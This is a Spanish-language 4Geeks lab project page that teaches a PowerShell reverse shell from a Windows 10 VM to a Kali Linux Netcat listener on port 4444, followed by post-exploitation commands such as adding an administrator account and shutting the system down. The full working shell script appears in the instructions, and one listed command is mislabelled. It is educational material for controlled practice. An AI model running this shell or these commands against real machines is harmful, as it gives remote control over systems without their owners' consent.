A tu propio ritmo

Explora nuestra extensa colección de cursos diseñados para ayudarte a dominar varios temas y habilidades. Ya seas un principiante o un aprendiz avanzado, aquí hay algo para todos.

Bootcamp

Aprende en vivo

Únete a nosotros en nuestros talleres gratuitos, webinars y otros eventos para aprender más sobre nuestros programas y comenzar tu camino para convertirte en desarrollador.

Próximos eventos en vivo

Catálogo de contenidos

Para los geeks autodidactas, este es nuestro extenso catálogo de contenido con todos los materiales y tutoriales que hemos desarrollado hasta el día de hoy.

Tiene sentido comenzar a aprender leyendo y viendo videos sobre los fundamentos y cómo funcionan las cosas.

Buscar en lecciones


IngresarEmpezar

Regístrate en 4Geeks

← Volver a Proyectos

Montar una shell inversa y ejecutar commandos remotos en windows

Dificultad

  • intermediate

Duración promedio

2 hrs

Tecnologías

Dificultad

  • intermediate

Duración promedio

2 hrs

Tecnologías

🌱 ¿Cómo empezar este proyecto?

Este ejercicio tiene como objetivo utilizar comandos CMD de Windows en el contexto de una conexión remota, simulando un ataque de hacking remoto. Este tutorial te ayudará a establecer una reverse shell desde una máquina Windows 10 hacia una máquina Kali Linux, ejecutando una serie de comandos para obtener información crítica del sistema Windows. Todo esto se hará en un entorno controlado, utilizando máquinas virtuales, y estará enfocado en la fase de post-explotación de un ataque ético.

Requisitos

  • Máquina atacante (Kali Linux):
    • Software necesario: Netcat (preinstalado en Kali Linux)
  • Máquina objetivo (Windows 10):
    • Acceso a PowerShell y permisos de ejecución de scripts

Ambas maquinas virtuales deben estar configuradas con la opción adaptador en modo puente para que puedan comunicarse a través de la red local.

📝 Instrucciones

  1. Configuración de la Red. Verifica que ambas máquinas se puedan comunicar utilizando el comando ping en Kali hacia Windows y viceversa.

  2. Establece la conexión con Netcat en la máquina Kali Linux (Atacante). Abre una terminal y escucha en un puerto específico (en este caso, el puerto 4444) utilizando Netcat:

1nc -lvnp 4444

Esto establecerá un listener en la máquina Kali, esperando la conexión desde Windows.

  1. Abre PowerShell en la máquina Windows 10 (Objetivo) y ejecuta el siguiente script para establecer la reverse shell:
1 $client = New-Object System.Net.Sockets.TCPClient("IP-de-Kali", 4444); 2 $stream = $client.GetStream(); 3 $reader = New-Object System.IO.StreamReader($stream); 4 $writer = New-Object System.IO.StreamWriter($stream); 5 $writer.AutoFlush = $true; 6 7 while ($true) { 8 $data = $reader.ReadLine(); 9 10 11 if ($data -eq "exit") { break } 12 13 try { 14 $result = Invoke-Expression $data 2>&1 | Out-String; 15 $writer.WriteLine($result); 16 } catch { 17 $writer.WriteLine("Error: $_"); 18 } 19 20 $writer.Flush(); 21 }

Nota: Recuerda reemplazar "IP-de-Kali" con la dirección IP de tu máquina Kali Linux.

imagen

Con el script ejecutándose en Windows, ya puedes enviar comandos desde Kali a través de la sesión Netcat que has iniciado. Aquí tienes algunos comandos útiles para interactuar con la máquina Windows:

imagen 1

Comandos básicos de windows:

  • Listar archivos en el directorio actual:
    1dir
  • Obtener información del sistema:
    1systeminfo

imagen 2

  • Obtener la configuración de red::
    1ipconfig

imagen 3

  • Listar procesos en ejecución:
    1tasklist

Comandos para información detallada:

imagen 4

  • Ver información del equipo:

    1hostname
  • Listar los usuarios en el sistema:

    1net user
  • Ver las conexiones de red activas::

    1netstat -an

Comandos para navegar por el sistema de archivos:

  • Cambiar de directorio::
    1tasklist
  • Crear un archivo o directorio::
    1mkdir C:\TestFolder

Comandos administrativos (si tienes privilegios):

  • Apagar o reiniciar el sistema::
    1shutdown /s /t 0 # Apagar 2shutdown /r /t 0 # Reiniciar
  • Agregar un usuario administrador::
    1net user nuevo_usuario contraseña /add 2net localgroup Administradores nuevo_usuario /add

    Investiga mas comandos para practicar.

Cerrar la sesión

  • Esto hará que el bucle en PowerShell termine y cierre la conexión.
    1exit

imagen 5

Regístrate para obtener acceso a proyectos similares

Lo usaremos para darte acceso a la comunidad.
¿Ya tienes una cuenta? Inicia sesión aquí.

Al registrarte estás aceptando nuestros Términos y condiciones y Política de privacidad.

Dificultad

  • intermediate

Duración promedio

2 hrs

Tecnologías

Dificultad

  • intermediate

Duración promedio

2 hrs

Tecnologías

Dificultad

  • intermediate

Duración promedio

2 hrs

Tecnologías

Dificultad

  • intermediate

Duración promedio

2 hrs

Tecnologías

Regístrate para obtener acceso a proyectos similares

Lo usaremos para darte acceso a la comunidad.
¿Ya tienes una cuenta? Inicia sesión aquí.

Al registrarte estás aceptando nuestros Términos y condiciones y Política de privacidad.

Dificultad

  • intermediate

Duración promedio

2 hrs

Tecnologías

Dificultad

  • intermediate

Duración promedio

2 hrs

Tecnologías